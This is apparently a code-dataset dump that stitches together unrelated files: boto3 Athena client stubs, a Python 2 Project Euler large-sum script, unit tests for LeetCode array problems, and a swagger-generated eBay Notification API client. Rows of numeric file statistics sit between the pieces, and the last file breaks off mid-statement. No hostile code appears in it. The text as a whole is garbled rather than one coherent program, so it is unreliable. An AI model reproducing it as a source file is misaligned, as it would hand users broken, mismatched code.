A tag value. The tag value length is from 0 to 256 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag values are case-sensitive.
NextToken (string) --
A token to be used by the next request if this request is truncated.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
Athena.Client.exceptions.ResourceNotFoundException
:return: {
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'NextToken': 'string'
}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
Athena.Client.exceptions.ResourceNotFoundException
"""
pass
def list_work_groups(NextToken=None, MaxResults=None):
"""
Lists available workgroups for the account.
See also: AWS API Documentation
Exceptions
:example: response = client.list_work_groups(
NextToken='string',
MaxResults=123
)
:type NextToken: string
:param NextToken: A token to be used by the next request if this request is truncated.
:type MaxResults: integer
:param MaxResults: The maximum number of workgroups to return in this request.
:rtype: dict
ReturnsResponse Syntax
{
'WorkGroups': [
{
'Name': 'string',
'State': 'ENABLED'|'DISABLED',
'Description': 'string',
'CreationTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
Response Structure
(dict) --
WorkGroups (list) --
The list of workgroups, including their names, descriptions, creation times, and states.
(dict) --
The summary information for the workgroup, which includes its name, state, description, and the date and time it was created.
Name (string) --
The name of the workgroup.
State (string) --
The state of the workgroup.
Description (string) --
The workgroup description.
CreationTime (datetime) --
The workgroup creation date and time.
NextToken (string) --
A token to be used by the next request if this request is truncated.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {
'WorkGroups': [
{
'Name': 'string',
'State': 'ENABLED'|'DISABLED',
'Description': 'string',
'CreationTime': datetime(2015, 1, 1)
},
],
'NextToken': 'string'
}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
"""
pass
def start_query_execution(QueryString=None, ClientRequestToken=None, QueryExecutionContext=None, ResultConfiguration=None, WorkGroup=None):
"""
Runs the SQL query statements contained in the Query . Requires you to have access to the workgroup in which the query ran.
For code samples using the AWS SDK for Java, see Examples and Code Samples in the Amazon Athena User Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.start_query_execution(
QueryString='string',
ClientRequestToken='string',
QueryExecutionContext={
'Database': 'string'
},
ResultConfiguration={
'OutputLocation': 'string',
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
}
},
WorkGroup='string'
)
:type QueryString: string
:param QueryString: [REQUIRED]\nThe SQL query statements to be executed.\n
:type ClientRequestToken: string
:param ClientRequestToken: A unique case-sensitive string used to ensure the request to create the query is idempotent (executes only once). If another StartQueryExecution request is received, the same response is returned and another query is not created. If a parameter has changed, for example, the QueryString , an error is returned.\n\nWarning\nThis token is listed as not required because AWS SDKs (for example the AWS SDK for Java) auto-generate the token for users. If you are not using the AWS SDK or the AWS CLI, you must provide this token or the action will fail.\n\nThis field is autopopulated if not provided.\n
:type QueryExecutionContext: dict
:param QueryExecutionContext: The database within which the query executes.\n\nDatabase (string) --The name of the database.\n\n\n
:type ResultConfiguration: dict
:param ResultConfiguration: Specifies information about where and how to save the results of the query execution. If the query runs in a workgroup, then workgroup\'s settings may override query settings. This affects the query results location. The workgroup settings override is specified in EnforceWorkGroupConfiguration (true/false) in the WorkGroupConfiguration. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .\n\nOutputLocation (string) --The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/ . To run the query, you must specify the query results location using one of the ways: either for individual queries using either this setting (client-side), or in the workgroup, using WorkGroupConfiguration . If none of them is set, Athena issues an error that no output location is provided. For more information, see Query Results . If workgroup settings override client-side settings, then the query uses the settings specified for the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .\n\nEncryptionConfiguration (dict) --If query results are encrypted in Amazon S3, indicates the encryption option used (for example, SSE-KMS or CSE-KMS ) and key information. This is a client-side setting. If workgroup settings override client-side settings, then the query uses the encryption configuration that is specified for the workgroup, and also uses the location for storing query results specified in the workgroup. See WorkGroupConfiguration$EnforceWorkGroupConfiguration and Workgroup Settings Override Client-Side Settings .\n\nEncryptionOption (string) -- [REQUIRED]Indicates whether Amazon S3 server-side encryption with Amazon S3-managed keys (SSE-S3 ), server-side encryption with KMS-managed keys (SSE-KMS ), or client-side encryption with KMS-managed keys (CSE-KMS) is used.\nIf a query runs in a workgroup and the workgroup overrides client-side settings, then the workgroup\'s setting for encryption is used. It specifies whether query results must be encrypted, for all queries that run in this workgroup.\n\nKmsKey (string) --For SSE-KMS and CSE-KMS , this is the KMS key ARN or ID.\n\n\n\n\n
:type WorkGroup: string
:param WorkGroup: The name of the workgroup in which the query is being started.
:rtype: dict
ReturnsResponse Syntax
{
'QueryExecutionId': 'string'
}
Response Structure
(dict) --
QueryExecutionId (string) --
The unique ID of the query that ran as a result of this request.
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
Athena.Client.exceptions.TooManyRequestsException
:return: {
'QueryExecutionId': 'string'
}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
Athena.Client.exceptions.TooManyRequestsException
"""
pass
def stop_query_execution(QueryExecutionId=None):
"""
Stops a query execution. Requires you to have access to the workgroup in which the query ran.
For code samples using the AWS SDK for Java, see Examples and Code Samples in the Amazon Athena User Guide .
See also: AWS API Documentation
Exceptions
:example: response = client.stop_query_execution(
QueryExecutionId='string'
)
:type QueryExecutionId: string
:param QueryExecutionId: [REQUIRED]\nThe unique ID of the query execution to stop.\nThis field is autopopulated if not provided.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {}
:returns:
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
"""
pass
def tag_resource(ResourceARN=None, Tags=None):
"""
Adds one or more tags to the resource, such as a workgroup. A tag is a label that you assign to an AWS Athena resource (a workgroup). Each tag consists of a key and an optional value, both of which you define. Tags enable you to categorize resources (workgroups) in Athena, for example, by purpose, owner, or environment. Use a consistent set of tag keys to make it easier to search and filter workgroups in your account. For best practices, see AWS Tagging Strategies . The key length is from 1 (minimum) to 128 (maximum) Unicode characters in UTF-8. The tag value length is from 0 (minimum) to 256 (maximum) Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag keys and values are case-sensitive. Tag keys must be unique per resource. If you specify more than one, separate them by commas.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceARN='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nRequests that one or more tags are added to the resource (such as a workgroup) for the specified ARN.\n
:type Tags: list
:param Tags: [REQUIRED]\nOne or more tags, separated by commas, to be added to the resource, such as a workgroup.\n\n(dict) --A tag that you can add to a resource. A tag is a label that you assign to an AWS Athena resource (a workgroup). Each tag consists of a key and an optional value, both of which you define. Tags enable you to categorize workgroups in Athena, for example, by purpose, owner, or environment. Use a consistent set of tag keys to make it easier to search and filter workgroups in your account. The maximum tag key length is 128 Unicode characters in UTF-8. The maximum tag value length is 256 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag keys and values are case-sensitive. Tag keys must be unique per resource.\n\nKey (string) --A tag key. The tag key length is from 1 to 128 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag keys are case-sensitive and must be unique per resource.\n\nValue (string) --A tag value. The tag value length is from 0 to 256 Unicode characters in UTF-8. You can use letters and numbers representable in UTF-8, and the following characters: + - = . _ : / @. Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
Athena.Client.exceptions.ResourceNotFoundException
:return: {}
:returns:
(dict) --
"""
pass
def untag_resource(ResourceARN=None, TagKeys=None):
"""
Removes one or more tags from the workgroup resource. Takes as an input a list of TagKey Strings separated by commas, and removes their tags at the same time.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceARN='string',
TagKeys=[
'string',
]
)
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nRemoves one or more tags from the workgroup resource for the specified ARN.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nRemoves the tags associated with one or more tag keys from the workgroup resource.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
Athena.Client.exceptions.ResourceNotFoundException
:return: {}
:returns:
(dict) --
"""
pass
def update_work_group(WorkGroup=None, Description=None, ConfigurationUpdates=None, State=None):
"""
Updates the workgroup with the specified name. The workgroup\'s name cannot be changed.
See also: AWS API Documentation
Exceptions
:example: response = client.update_work_group(
WorkGroup='string',
Description='string',
ConfigurationUpdates={
'EnforceWorkGroupConfiguration': True|False,
'ResultConfigurationUpdates': {
'OutputLocation': 'string',
'RemoveOutputLocation': True|False,
'EncryptionConfiguration': {
'EncryptionOption': 'SSE_S3'|'SSE_KMS'|'CSE_KMS',
'KmsKey': 'string'
},
'RemoveEncryptionConfiguration': True|False
},
'PublishCloudWatchMetricsEnabled': True|False,
'BytesScannedCutoffPerQuery': 123,
'RemoveBytesScannedCutoffPerQuery': True|False,
'RequesterPaysEnabled': True|False
},
State='ENABLED'|'DISABLED'
)
:type WorkGroup: string
:param WorkGroup: [REQUIRED]\nThe specified workgroup that will be updated.\n
:type Description: string
:param Description: The workgroup description.
:type ConfigurationUpdates: dict
:param ConfigurationUpdates: The workgroup configuration that will be updated for the given workgroup.\n\nEnforceWorkGroupConfiguration (boolean) --If set to 'true', the settings for the workgroup override client-side settings. If set to 'false' client-side settings are used. For more information, see Workgroup Settings Override Client-Side Settings .\n\nResultConfigurationUpdates (dict) --The result configuration information about the queries in this workgroup that will be updated. Includes the updated results location and an updated option for encrypting query results.\n\nOutputLocation (string) --The location in Amazon S3 where your query results are stored, such as s3://path/to/query/bucket/ . For more information, see Query Results If workgroup settings override client-side settings, then the query uses the location for the query results and the encryption configuration that are specified for the workgroup. The 'workgroup settings override' is specified in EnforceWorkGroupConfiguration (true/false) in the WorkGroupConfiguration. See WorkGroupConfiguration$EnforceWorkGroupConfiguration .\n\nRemoveOutputLocation (boolean) --If set to 'true', indicates that the previously-specified query results location (also known as a client-side setting) for queries in this workgroup should be ignored and set to null. If set to 'false' or not set, and a value is present in the OutputLocation in ResultConfigurationUpdates (the client-side setting), the OutputLocation in the workgroup\'s ResultConfiguration will be updated with the new value. For more information, see Workgroup Settings Override Client-Side Settings .\n\nEncryptionConfiguration (dict) --The encryption configuration for the query results.\n\nEncryptionOption (string) -- [REQUIRED]Indicates whether Amazon S3 server-side encryption with Amazon S3-managed keys (SSE-S3 ), server-side encryption with KMS-managed keys (SSE-KMS ), or client-side encryption with KMS-managed keys (CSE-KMS) is used.\nIf a query runs in a workgroup and the workgroup overrides client-side settings, then the workgroup\'s setting for encryption is used. It specifies whether query results must be encrypted, for all queries that run in this workgroup.\n\nKmsKey (string) --For SSE-KMS and CSE-KMS , this is the KMS key ARN or ID.\n\n\n\nRemoveEncryptionConfiguration (boolean) --If set to 'true', indicates that the previously-specified encryption configuration (also known as the client-side setting) for queries in this workgroup should be ignored and set to null. If set to 'false' or not set, and a value is present in the EncryptionConfiguration in ResultConfigurationUpdates (the client-side setting), the EncryptionConfiguration in the workgroup\'s ResultConfiguration will be updated with the new value. For more information, see Workgroup Settings Override Client-Side Settings .\n\n\n\nPublishCloudWatchMetricsEnabled (boolean) --Indicates whether this workgroup enables publishing metrics to Amazon CloudWatch.\n\nBytesScannedCutoffPerQuery (integer) --The upper limit (cutoff) for the amount of bytes a single query in a workgroup is allowed to scan.\n\nRemoveBytesScannedCutoffPerQuery (boolean) --Indicates that the data usage control limit per query is removed. WorkGroupConfiguration$BytesScannedCutoffPerQuery\n\nRequesterPaysEnabled (boolean) --If set to true , allows members assigned to a workgroup to specify Amazon S3 Requester Pays buckets in queries. If set to false , workgroup members cannot query data from Requester Pays buckets, and queries that retrieve data from Requester Pays buckets cause an error. The default is false . For more information about Requester Pays buckets, see Requester Pays Buckets in the Amazon Simple Storage Service Developer Guide .\n\n\n
:type State: string
:param State: The workgroup state that will be updated for the given workgroup.
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
Athena.Client.exceptions.InternalServerException
Athena.Client.exceptions.InvalidRequestException
:return: {}
:returns:
(dict) --
"""
pass
| 39.56517
| 3,846
| 0.699181
| 8,777
| 72,246
| 5.739091
| 0.077019
| 0.020646
| 0.027079
| 0.025014
| 0.817815
| 0.794231
| 0.778845
| 0.753792
| 0.736302
| 0.728877
| 0
| 0.006084
| 0.228732
| 72,246
| 1,825
| 3,847
| 39.586849
| 0.89792
| 0.969728
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
aa86014d9bec52a8e02ab3027ebcc87b83f96443
| 5,265
|
py
|
Python
|
python/p13.py
|
luizfranca/project-euler
|
9bd43954283ecf27c61303b7004f24df5dddcabe
|
[
"MIT"
] | null | null | null |
python/p13.py
|
luizfranca/project-euler
|
9bd43954283ecf27c61303b7004f24df5dddcabe
|
[
"MIT"
] | null | null | null |
python/p13.py
|
luizfranca/project-euler
|
9bd43954283ecf27c61303b7004f24df5dddcabe
|
[
"MIT"
] | null | null | null |
# Project Euler
# Problem 12
# Large sum
number = """
37107287533902102798797998220837590246510135740250
46376937677490009712648124896970078050417018260538
74324986199524741059474233309513058123726617309629
91942213363574161572522430563301811072406154908250
23067588207539346171171980310421047513778063246676
89261670696623633820136378418383684178734361726757
28112879812849979408065481931592621691275889832738
44274228917432520321923589422876796487670272189318
47451445736001306439091167216856844588711603153276
70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690""".replace("\n", "")
s = 0
for i in range(100):
s += int(number[i * 50: (i + 1) * 50])
print str(s)[:10]
| 46.184211
| 71
| 0.966192
| 128
| 5,265
| 39.742188
| 0.953125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.977765
| 0.026211
| 5,265
| 114
| 72
| 46.184211
| 0.014433
| 0.006458
| 0
| 0
| 0
| 0
| 0.975899
| 0.956389
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.009524
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa8e7e4e868d0d3eb8db5039b1b78fc6733322c6
| 8,273
|
py
|
Python
|
tests/arrays/test_leetcode_arrays_solution.py
|
nutshellfool/algorithmPlayground_python
|
cb3a56a879ad5edc526a09c750c073596bb956d4
|
[
"MIT"
] | null | null | null |
tests/arrays/test_leetcode_arrays_solution.py
|
nutshellfool/algorithmPlayground_python
|
cb3a56a879ad5edc526a09c750c073596bb956d4
|
[
"MIT"
] | null | null | null |
tests/arrays/test_leetcode_arrays_solution.py
|
nutshellfool/algorithmPlayground_python
|
cb3a56a879ad5edc526a09c750c073596bb956d4
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from src.arrays.leetcode_arrays_solution import Solution
class TestArrayLeetCodeSolution(TestCase):
def setUp(self):
self.solution = Solution()
def test_maxArea(self):
height = [1, 8, 6, 2, 5, 4, 8, 3, 7]
max_area = self.solution.maxArea(height)
self.assertIsNotNone(max_area)
self.assertEqual(49, max_area)
def test_maxArea_none_params(self):
max_area = self.solution.maxArea(None)
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_params_length_less_than_3(self):
max_area = self.solution.maxArea([1, 2])
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_params_length_equals_3(self):
max_area = self.solution.maxArea([1, 1, 1])
self.assertIsNotNone(max_area)
self.assertEqual(2, max_area)
def test_maxArea_brutal_force(self):
height = [1, 8, 6, 2, 5, 4, 8, 3, 7]
max_area = self.solution.maxArea_brutal_force(height)
self.assertIsNotNone(max_area)
self.assertEqual(49, max_area)
def test_maxArea_brutal_force_none_params(self):
max_area = self.solution.maxArea_brutal_force(None)
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_brutal_force_params_length_less_than_3(self):
max_area = self.solution.maxArea_brutal_force([1, 2])
self.assertIsNotNone(max_area)
self.assertEqual(0, max_area)
def test_maxArea_brutal_force_params_length_equals_3(self):
max_area = self.solution.maxArea_brutal_force([1, 1, 1])
self.assertIsNotNone(max_area)
self.assertEqual(2, max_area)
def test_trap_brutal_force(self):
height = [0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]
unit_of_trapped = self.solution.trap_brutal_force(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(6, unit_of_trapped)
def test_trap_brutal_force_none_params(self):
unit_of_trapped = self.solution.trap_brutal_force(None)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_brutal_force_empty_params(self):
unit_of_trapped = self.solution.trap_brutal_force([])
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_brutal_force_params_length_less_than_3(self):
height = [2, 1]
unit_of_trapped = self.solution.trap_brutal_force(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_brutal_force_params_length_equals_3(self):
height = [2, 1, 2]
unit_of_trapped = self.solution.trap_brutal_force(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(1, unit_of_trapped)
def test_trap(self):
height = [0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]
unit_of_trapped = self.solution.trap(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(6, unit_of_trapped)
def test_trap_none_params(self):
unit_of_trapped = self.solution.trap(None)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_empty_params(self):
unit_of_trapped = self.solution.trap([])
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_params_length_less_than_3(self):
height = [2, 1]
unit_of_trapped = self.solution.trap(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_params_length_equals_3(self):
height = [2, 1, 2]
unit_of_trapped = self.solution.trap(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(1, unit_of_trapped)
def test_trap_dynamic_programming(self):
height = [0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1]
unit_of_trapped = self.solution.trap_dynamic_programming(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(6, unit_of_trapped)
def test_trap_dynamic_programming_none_params(self):
unit_of_trapped = self.solution.trap_dynamic_programming(None)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_dynamic_programming_empty_params(self):
unit_of_trapped = self.solution.trap_dynamic_programming([])
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_dynamic_programming_params_length_less_than_3(self):
height = [2, 1]
unit_of_trapped = self.solution.trap_dynamic_programming(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(0, unit_of_trapped)
def test_trap_dynamic_programming_params_length_equals_3(self):
height = [2, 1, 2]
unit_of_trapped = self.solution.trap_dynamic_programming(height)
self.assertIsNotNone(unit_of_trapped)
self.assertEqual(1, unit_of_trapped)
def test_sortColors(self):
_color_array = [2, 0, 2, 1, 1, 0]
_sorted_array = self.solution.sortColors(_color_array)
self.assertIsNotNone(_sorted_array)
self.assertEqual(6, len(_sorted_array))
self.assertEqual([0, 0, 1, 1, 2, 2], _sorted_array)
def test_sortColors_None(self):
_sorted_array = self.solution.sortColors(None)
self.assertIsNone(_sorted_array)
def test_sortColors_empty(self):
_sorted_array = self.solution.sortColors([])
self.assertIsNotNone(_sorted_array)
self.assertEqual(0, len(_sorted_array))
def test_sortColors_instinct(self):
_color_array = [2, 0, 2, 1, 1, 0]
_sorted_array = self.solution.sortColors_instinct(_color_array)
self.assertIsNotNone(_sorted_array)
self.assertEqual(6, len(_sorted_array))
self.assertEqual([0, 0, 1, 1, 2, 2], _sorted_array)
def test_sortColors_instinct_None(self):
_sorted_array = self.solution.sortColors_instinct(None)
self.assertIsNone(_sorted_array)
def test_sortColors_instinct_empty(self):
_sorted_array = self.solution.sortColors_instinct([])
self.assertIsNotNone(_sorted_array)
self.assertEqual(0, len(_sorted_array))
def test_moveZeroes(self):
_array = [0, 1, 0, 3, 12]
self.solution.moveZeroes(_array)
self.assertIsNotNone(_array)
self.assertEqual([1, 3, 12, 0, 0], _array)
def test_moveZeroes1(self):
_array = [0, 3, 0, 1, 12]
self.solution.moveZeroes(_array)
self.assertIsNotNone(_array)
self.assertEqual([3, 1, 12, 0, 0], _array)
def test_removeDuplicates(self):
_array = [1, 1, 2]
size = self.solution.removeDuplicates(_array)
self.assertIsNotNone(_array)
self.assertEqual(2, size)
def test_removeDuplicates1(self):
_array = [0, 0, 1, 1, 1, 2, 2, 3, 3, 4]
size = self.solution.removeDuplicates(_array)
self.assertIsNotNone(_array)
self.assertEqual(5, size)
def test_maxEnvelopes(self):
_envelopes = [[5, 4], [6, 4], [6, 7], [2, 3]]
_max_envelopes = self.solution.maxEnvelopes(_envelopes)
self.assertEqual(3, _max_envelopes)
def test_maxEnvelopes1(self):
_envelopes = [[4, 5], [4, 6], [6, 7], [2, 3], [1, 1]]
_max_envelopes = self.solution.maxEnvelopes(_envelopes)
self.assertEqual(4, _max_envelopes)
def test_merge(self):
intervals = [[1, 3], [2, 6], [8, 10], [15, 18]]
expected = [[1, 6], [8, 10], [15, 18]]
_merged_interval = self.solution.merge(intervals)
self.assertEqual(expected, _merged_interval)
def test_merge1(self):
intervals = [[1, 4], [4, 6]]
expected = [[1, 6]]
_merged_interval = self.solution.merge(intervals)
self.assertEqual(expected, _merged_interval)
def test_merge_none(self):
_merged = self.solution.merge(None)
self.assertIsNone(_merged)
def test_merge_empty(self):
_merged = self.solution.merge([])
self.assertIsNone(_merged)
| 37.265766
| 72
| 0.677143
| 1,083
| 8,273
| 4.834718
| 0.064635
| 0.051566
| 0.111727
| 0.097403
| 0.894194
| 0.87796
| 0.863827
| 0.821429
| 0.75382
| 0.733766
| 0
| 0.035742
| 0.218784
| 8,273
| 221
| 73
| 37.434389
| 0.774408
| 0
| 0
| 0.539326
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.404494
| 1
| 0.224719
| false
| 0
| 0.011236
| 0
| 0.241573
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aa9c7569a27d69570cd01db2ef721bf49ae91caf
| 7,787
|
py
|
Python
|
src/ebay_rest/api/commerce_notification/api/config_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/commerce_notification/api/config_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/commerce_notification/api/config_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Notification API
The eBay Notification API enables management of the entire end-to-end eBay notification experience by allowing users to:<ul><li>Browse for supported notification topics and retrieve topic details</li><li>Create, configure, and manage notification destination endpionts</li><li>Configure, manage, and test notification subscriptions</li><li>Process eBay notifications and verify the integrity of the message payload</li></ul> # noqa: E501
OpenAPI spec version: v1.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...commerce_notification.api_client import ApiClient
class ConfigApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_config(self, **kwargs): # noqa: E501
"""get_config # noqa: E501
This method allows applications to retrieve a previously created configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_config(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Config
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_config_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_config_with_http_info(**kwargs) # noqa: E501
return data
def get_config_with_http_info(self, **kwargs): # noqa: E501
"""get_config # noqa: E501
This method allows applications to retrieve a previously created configuration. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_config_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: Config
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_config" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
